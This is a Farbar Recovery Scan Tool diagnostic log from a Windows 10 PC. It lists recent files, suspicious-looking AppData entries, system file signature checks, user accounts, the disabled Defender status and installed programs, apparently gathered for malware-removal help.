2016-04-08 23:28 - 2016-04-08 23:28 - 03119168 _____ C:\Users\RoNiN\Downloads\AdwCleaner.exe
2016-04-08 10:20 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\system32\gpedit.msc
2016-04-08 09:56 - 2016-04-08 09:56 - 00707354 _____ C:\WINDOWS\unins000.exe
2016-04-08 09:56 - 2016-04-08 09:56 - 00001535 _____ C:\WINDOWS\unins000.dat
2016-04-08 09:56 - 2016-04-08 09:56 - 00000000 ____D C:\WINDOWS\SysWOW64\GPBAK
2016-04-08 09:56 - 2008-04-14 02:11 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appmgr.dll
2016-04-08 09:56 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\SysWOW64\gpedit.msc
2016-04-07 20:55 - 2016-04-30 14:03 - 00000000 ____D C:\FRST
2016-04-07 18:06 - 2016-04-07 18:08 - 00271216 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_18.06.48_log.txt
2016-04-07 16:15 - 2016-04-16 13:35 - 00000000 ____D C:\AdwCleaner
2016-04-07 15:48 - 2016-04-07 15:48 - 00000490 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.48.47_log.txt
2016-04-07 15:05 - 2016-04-07 15:08 - 00270622 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.05.40_log.txt
2016-04-05 13:10 - 2016-04-16 13:32 - 00000000 ____D C:\virus
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-30 14:03 - 2011-02-19 00:22 - 00000932 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-30 13:52 - 2015-07-30 18:42 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-30 13:52 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-30 13:40 - 2010-10-17 17:13 - 00000000 ____D C:\Program Files (x86)\The GodFather
2016-04-30 13:10 - 2014-05-10 00:37 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job
2016-04-30 13:07 - 2014-05-26 01:05 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-04-30 11:37 - 2015-10-03 04:40 - 00000000 ____D C:\Users\RoNiN
2016-04-30 11:37 - 2011-02-19 00:22 - 00000928 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-30 11:36 - 2015-07-30 17:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-28 18:25 - 2015-12-18 20:59 - 00139925 _____ C:\Users\RoNiN\Downloads\tom.dreiling@gmail.com.ical 2016-04-29.zip
2016-04-26 18:49 - 2016-03-22 21:01 - 00000000 ____D C:\Users\postgres
2016-04-21 16:10 - 2014-05-10 00:37 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job
2016-04-20 08:00 - 2015-07-10 05:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-18 18:12 - 2010-10-17 21:14 - 00565248 _____ C:\Users\RoNiN\Desktop\Info.mdb
2016-04-16 20:31 - 2015-03-01 21:13 - 00000000 ____D C:\Users\RoNiN\Documents\888PokerNJ
2016-04-16 18:29 - 2015-03-01 22:07 - 00000000 ____D C:\Program Files (x86)\PokerTracker 4
2016-04-16 18:29 - 2015-03-01 21:31 - 00000000 ____D C:\Users\RoNiN\AppData\Local\PokerTracker 4
2016-04-16 16:28 - 2014-12-14 18:28 - 00000000 ____D C:\Users\RoNiN\Desktop\Pics
2016-04-14 19:08 - 2016-03-13 14:29 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-04-14 18:36 - 2015-07-30 18:40 - 00000000 ____D C:\WINDOWS\INF
2016-04-13 20:23 - 2011-08-23 00:51 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Temp
2016-04-13 20:21 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-04-12 17:52 - 2015-10-03 08:42 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Packages
2016-04-11 19:17 - 2016-03-23 23:06 - 00002282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-04-11 19:17 - 2016-03-23 23:06 - 00002270 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-04-09 18:44 - 2016-03-22 21:58 - 00000000 ____D C:\Program Files\Emsisoft Anti-Malware
2016-04-09 18:40 - 2014-01-05 20:04 - 00000000 ____D C:\Users\RoNiN\Desktop\XBOX1
2016-04-09 16:28 - 2015-10-03 04:36 - 00006876 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-09 14:33 - 2016-03-13 14:29 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-04-09 12:44 - 2010-10-17 10:09 - 00000000 ____D C:\Users\RoNiN\Documents\Text Documents
2016-04-09 11:12 - 2010-10-16 20:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Intuit
2016-04-09 10:39 - 2012-02-07 03:14 - 00001545 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2016-04-09 10:33 - 2011-02-15 01:43 - 00000000 ____D C:\Program Files (x86)\TurboTax
2016-04-09 00:04 - 2011-02-19 00:22 - 00000000 ____D C:\Program Files (x86)\Google
2016-04-08 15:53 - 2009-07-13 23:20 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-04-08 13:45 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-04-08 13:17 - 2016-03-22 08:01 - 00003650 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2016-04-07 16:20 - 2011-07-10 23:21 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Yahoo!
2016-04-07 14:52 - 2013-11-10 15:02 - 04126550 _____ C:\WINDOWS\ntbtlog.txt
2016-04-07 14:36 - 2015-07-30 18:42 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
 
==================== Files in the root of some directories =======
 
2016-03-11 19:39 - 2016-03-11 19:39 - 7600640 _____ () C:\Users\RoNiN\AppData\Roaming\agent.dat
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Ambient
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Mono
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Pad
2015-10-29 09:35 - 2015-10-29 09:35 - 0000093 _____ () C:\Users\RoNiN\AppData\Roaming\ARCompanion.log
2016-03-11 19:38 - 2016-03-11 19:38 - 0072729 _____ () C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2015-04-19 08:20 - 2015-04-19 08:20 - 0005872 _____ () C:\Users\RoNiN\AppData\Roaming\GWB6hPAk0e6t
2016-03-11 19:32 - 2016-03-11 19:32 - 0127488 _____ () C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 0018432 _____ () C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 1786944 _____ () C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-21 19:35 - 2016-03-21 19:35 - 0000046 _____ () C:\Users\RoNiN\AppData\Roaming\WB.CFG
2011-03-09 00:31 - 2012-12-28 02:36 - 0004608 _____ () C:\Users\RoNiN\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-04 17:15 - 2011-09-04 18:54 - 0044224 _____ () C:\Users\RoNiN\AppData\Local\RAContactHistory.xml
2014-01-13 08:41 - 2015-05-10 15:55 - 0007599 _____ () C:\Users\RoNiN\AppData\Local\Resmon.ResmonCfg
2016-03-09 18:03 - 2016-03-09 18:03 - 0002560 _____ () C:\Users\RoNiN\AppData\Local\uninstall.exe
2012-11-05 05:50 - 2012-11-05 05:50 - 0000026 ____H () C:\ProgramData\.811261211181235583101118113995
2010-12-13 23:04 - 2011-03-23 01:59 - 0000083 ___SH () C:\ProgramData\.zreglib
2012-05-27 21:35 - 2012-05-27 21:35 - 0000057 _____ () C:\ProgramData\Ament.ini
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Analog Sync
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\ProgramData\Animals
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Applause and Laugher
2010-10-17 21:03 - 2010-10-17 21:03 - 0004998 _____ () C:\ProgramData\bltofzsb.qlf
2015-03-01 21:31 - 2015-03-01 21:31 - 0004939 _____ () C:\ProgramData\flwjycbm.bab
2012-02-07 03:14 - 2016-04-09 10:39 - 0001545 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2016-04-16 17:27 - 2016-04-16 17:27 - 0000016 _____ () C:\ProgramData\mntemp
2014-02-13 05:54 - 2014-02-13 05:54 - 0000020 ____H () C:\ProgramData\PKP_DLes.DAT
2014-02-13 05:53 - 2015-06-25 13:12 - 0000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-02-13 05:53 - 2015-09-27 23:45 - 0000020 ____H () C:\ProgramData\PKP_DLev.DAT
 
Some files in TEMP:
====================
C:\Users\RoNiN\AppData\Local\Temp\libeay32.dll
C:\Users\RoNiN\AppData\Local\Temp\msvcr120.dll
C:\Users\RoNiN\AppData\Local\Temp\setup.exe
C:\Users\RoNiN\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-04-28 18:01
 
==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-30 14:05:29)
Running from C:\virus
Windows 10 Home (X64) (2015-10-03 12:41:30)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-470165136-1162808608-978993673-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-470165136-1162808608-978993673-503 - Limited - Disabled)
Guest (S-1-5-21-470165136-1162808608-978993673-501 - Limited - Disabled)
Mcx1-RONIN-LAPTOP (S-1-5-21-470165136-1162808608-978993673-1013 - Limited - Enabled)
postgres (S-1-5-21-470165136-1162808608-978993673-1005 - Limited - Enabled) => C:\Users\postgres
RoNiN (S-1-5-21-470165136-1162808608-978993673-1001 - Administrator - Enabled) => C:\Users\RoNiN
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
888pokerNJ (HKLM-x32\...\888pokerNJ) (Version:  - )
abgx360 v1.0.6 (HKLM-x32\...\abgx360) (Version:  - )
AC3Filter (remove only) (HKLM-x32\...\AC3Filter) (Version:  - )
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX 64-bit (HKLM\...\Adobe Flash Player ActiveX 64) (Version: 10.2.161.23 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Amazon Amazon Music) (Version: 3.1.0.570 - Amazon Services LLC)
AnswerWorks 5.0 English Runtime (HKLM-x32\...\{DBCC73BA-C69A-4BF5-B4BF-F07501EE7039}) (Version: 5.0.7 - Vantage Software Technologies)
AnyDVD (HKLM-x32\...\AnyDVD) (Version: 6.7.8.0 - SlySoft)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Magic-i Visual Effects 2 (HKLM-x32\...\{8E90189A-A5D4-4C0E-A908-06C4236F98EE}) (Version: 2.0.10.94 - ArcSoft)
ArcSoft Print Creations - Album Page (HKLM-x32\...\{E6B4117F-AC59-4B13-9274-EB136E8897EE}) (Version:  - ArcSoft)
ArcSoft Print Creations - Brochures & Flyers (HKLM-x32\...\{01A1A019-E1D8-482A-BE17-5E118D17C0A0}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse (HKLM-x32\...\{9591C049-5CAE-4E89-A8D9-191F1899628B}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse II (HKLM-x32\...\{3CE47E6B-AE27-4E40-AC54-329EED96B933}) (Version:  - ArcSoft)
ArcSoft Print Creations - Greeting Card (HKLM-x32\...\{F04F9557-81A9-4293-BC49-2C216FA325A7}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Book (HKLM-x32\...\{56589DFE-0C29-4DFE-8E42-887B771ECD23}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Calendar (HKLM-x32\...\{CA9ED5E4-1548-485B-A293-417840060158}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Prints (HKLM-x32\...\{95F875CC-1B85-43E6-B3E0-13EA04F3D995}) (Version:  - ArcSoft)
ArcSoft Print Creations - Poster Creator (HKLM-x32\...\{5D1C82E7-7EC0-4404-A8AD-36C3B444BC34}) (Version:  - ArcSoft)
ArcSoft Print Creations - Scrapbook (HKLM-x32\...\{B0D83FCD-9D42-43ED-8315-250326AADA02}) (Version:  - ArcSoft)
ArcSoft Print Creations - Slimline Card (HKLM-x32\...\{007B37D9-0C45-4202-834B-DD5FAAE99D63}) (Version:  - ArcSoft)
ArcSoft Print Creations (HKLM-x32\...\{A3324BBB-3A83-40CE-AA8C-759D849B7EA1}) (Version: 3.0.255.487 - ArcSoft)
ArcSoft WebCam Companion 3 (HKLM-x32\...\{25478065-4CB1-448C-80E4-8C4529017EE3}) (Version: 3.0.32.354 - ArcSoft)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
BitTorrent (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\BitTorrent) (Version: 7.9.2.38398 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BovadaPoker (HKLM-x32\...\{D7CA2DF8-95CE-4C80-9296-98E21219A1E5}}_is1) (Version:   -  )
BurnRecovery (HKLM-x32\...\{2892E1B7-E24D-4CCB-B8A7-B63D4B66F89F}) (Version: 3.0.912.401 - Micro-Star International Co., Ltd.)
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Chrome Remote Desktop Host (HKLM-x32\...\{C230A275-D2A0-446B-ACE5-06BF067D50F2}) (Version: 50.0.2661.22 - Google Inc.)
ChromecastApp (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1) (Version: 1.5.1693.0 - Google Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.2.100.14 - Citrix Systems, Inc.)
DIRECTV Player (HKLM-x32\...\{dbaba6a3-366e-43a7-8f4e-b0a868c06ab3}) (Version: 10.0 - DIRECTV)
DIRECTV2PC Playback Advisor (HKLM-x32\...\InstallShield_{479F8C12-576B-4A58-AB78-4B70F7012AA8}) (Version: 1.0 - CyberLink Corp.)
DIRECTV2PC Playback Advisor (x32 Version: 1.0 - CyberLink Corp.) Hidden
DIRECTV2PC™ (HKLM-x32\...\InstallShield_{E9B10AA5-E5F6-4DEF-A435-FB20704AF1E8}) (Version: 2.0.7507 - CyberLink Corp.)
DIRECTV2PC™ (x32 Version: 2.0.7507 - CyberLink Corp.) Hidden
Doyles Room (HKLM-x32\...\78315C9D-B2DA-4430-B077-1BDA99CCB43D) (Version: 9.4 - IGSoft)
Ear Force Audio Hub (HKLM-x32\...\{64D69874-302B-4E2C-B18C-D79667822110}) (Version: 6.6.2.0 - Turtle Beach)
ELAN Touchpad 15.9.6.1_X64_WHQL (HKLM\...\Elantech) (Version: 15.9.6.1 - ELAN Microelectronic Corp.)
FairStars CD Ripper 1.90 (HKLM-x32\...\FairStars CD Ripper_is1) (Version:  - FairStars Soft)
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 2.TTRS.2015 - Thrustmaster)
Final Draft (HKLM-x32\...\{7C3C895B-AE02-4F30-8A6A-051D37A38DD0}) (Version: 8.0.1.89 - Final Draft, Inc.)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{34EB6245-C8D0-4D8A-B8D8-EEBFF7A91485}) (Version: 2.1.27.0 - MAGIX AG)
foobar2000 v1.3.8 (HKLM-x32\...\foobar2000) (Version: 1.3.8 - Peter Pawlowski)
G-Force (HKLM-x32\...\G-Force) (Version: 4.2.0 - SoundSpectrum)
Gmail POP Troubleshooter (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\GmailPopTroubleshooter) (Version: 0.1 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
gpedt.msc 1.0 (HKLM-x32\...\{10B9C608-BF7C-4CCF-A658-C01D969DCA21}_is1) (Version:  - Richard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.5192 - HP Photo Creations)
HP Photosmart 6510 series Basic Device Software (HKLM\...\{EB0D4D8B-A604-42D3-84D8-CCAFA75F753E}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Photosmart 6510 series Help (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)
iCloud (HKLM\...\{CE97E4D3-9F91-4D72-8A29-ED9EA90E5A15}) (Version: 2.1.3.25 - Apple Inc.)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.6.0 - LIGHTNING UK!)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
JDownloader (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\JDownloader) (Version:  - AppWork UG (haftungsbeschränkt))
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Live Update 5 (HKLM-x32\...\{E8BAA541-D161-4C9B-85BF-01F05A56BD7F}}_is1) (Version: 5.0.111 - MSI)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
MAGIX Music Maker 16 Download Version (HKLM-x32\...\MAGIX Music Maker 16 Download Version UK) (Version: 16.0.3.0 - MAGIX AG)
MAGIX Photo Manager 9 (HKLM-x32\...\MAGIX Photo Manager 9 UK) (Version: 7.0.3.119 - MAGIX AG)
MAGIX Screenshare (HKLM-x32\...\MAGIX Screenshare UK) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM-x32\...\MAGIX Speed burnR UK) (Version: 6.0.1.2 - MAGIX AG)
MAGIX Video easy SE (HKLM-x32\...\MAGIX_MSI_Video_easy_SE) (Version: 1.0.4.1 - MAGIX AG)
MAGIX Video easy SE (x32 Version: 1.0.4.1 - MAGIX AG) Hidden
Microsoft Digital Image Pro 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Expression Studio 3 (HKLM-x32\...\ExpressionStudio_3.0.1061.0) (Version: 3.0.1061.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office XP Professional (HKLM-x32\...\{91110409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.2627.01 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - KB2467175 (HKLM-x32\...\{a0fe116e-9a8a-466f-aee0-625cb7c207e3}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
MobileMe Control Panel (HKLM\...\{41BC9E31-0D39-462E-8E4C-767B21A3B1C3}) (Version: 3.1.8.0 - Apple Inc.)
Mp3tag v2.52 (HKLM-x32\...\Mp3tag) (Version: v2.52 - Florian Heidenreich)
msi Software Install (HKLM-x32\...\{A840FFFB-3A80-4C24-AB34-BE9F56BEB4CE}) (Version: 3.1000.1005.1101 - Micro-Star International Co., Ltd.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Music Manager (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\MusicManager) (Version:  - Google, Inc.)
MyHarmony (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.0 - Nikon)
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.92 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Online Plug-in (x32 Version: 14.2.100.14 - Citrix Systems, Inc.) Hidden
Photo Stamp Remover 6.0 (HKLM-x32\...\Photo Stamp Remover_is1) (Version: 6.0 - SoftOrbits)
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.5.0 - Nikon)
Poker Tournament Supervisor (HKLM-x32\...\{93ED8388-3C43-4D49-8081-03A0BE7D4E2F}_is1) (Version: 1.3n - Hermann Sorais)
Poker Tournament Supervisor 2 (HKLM-x32\...\{105094B6-4CE8-4AB8-BC17-DDE37F3DE050}}_is1) (Version: 2.0a - Graph & In)
PokerTracker 3 (remove only) (HKLM-x32\...\PokerTracker3) (Version:  - )
PokerTracker 4 (remove only) (HKLM-x32\...\PokerTracker4) (Version:  - )
PostgreSQL 8.3 (HKLM-x32\...\{B823632F-3B72-4514-8861-B961CE263224}) (Version: 8.3 - PostgreSQL Global Development Group)
PX5 Advanced Sound Editor (HKLM-x32\...\{276B495F-9DB0-4FC6-BEB0-85C91FC0F5E2}) (Version: 0.9.0.0 - Turtle Beach)
Quicken 2009 (HKLM-x32\...\{ED2A3C11-3EA8-4380-B59C-F2C1832731B0}) (Version: 18.1.1.29 - Intuit)
Quicken 2011 (HKLM-x32\...\{5FE545A1-D215-4216-9189-E7B39C9D1CC1}) (Version: 20.1.8.6 - Intuit)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.8.8 - Intuit)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
RealDownloader (x32 Version: 1.3.2 - RealNetworks, Inc.) Hidden
